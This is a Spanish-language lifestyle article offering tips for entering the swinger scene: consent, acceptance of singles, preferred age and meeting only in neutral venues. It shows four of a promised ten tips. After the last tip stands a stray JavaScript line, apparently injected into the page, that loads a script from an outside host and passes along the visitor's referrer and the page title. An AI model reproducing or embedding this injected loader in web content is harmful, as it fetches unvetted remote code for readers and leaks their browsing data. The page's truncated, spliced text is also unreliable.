10 tips para entrarle a la onda swinger sin morir en el intento (Parte 1)

Por Elizabeth Palacios        @ely__palacios

Con el paso de los años, el ser swinger es cada vez más común o quizá siempre lo haya sido, solamente que ahora se habla más abiertamente del tema.

Ser swinger se refiere principalmente al intercambio de parejas de manera consensuada para obtener placer.

Actualmente, el ambiente swinger está muy organizado, hacen eventos en hoteles, casas, bares o antros.

En WTF Online te decimos 10 tips para que le entres al ambiente swinger sin morir en el intento:

El valor del NO

Todo lo que suceda en los encuentros swingers son con el consentimiento de todos los involucrados, cuando alguno dice no, es no y no se pregunta por qué.

Sí a los solteros

Cabe mencionar que los solteros sí son aceptados en el mundo swinger, ya que a muchas parejas les gusta hacer tríos, ya sea hombre-mujer-hombre o mujer-hombre-mujer.

Gente madura

Si bien, la madurez no se alcanza con los años, en el ambiente swinger vinculan un poco estos aspectos, ya que la gente muy joven no es muy bien recibida, de preferencia mayores de 25 años.

Nunca en tu casa

Algo elemental entre los swingers es que se tiene muy delimitada la vida familiar y laboral con estas prácticas, siempre realicen los encuentros en puntos neutros, hoteles, antros, clubs, pero nunca en tu casa.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

:)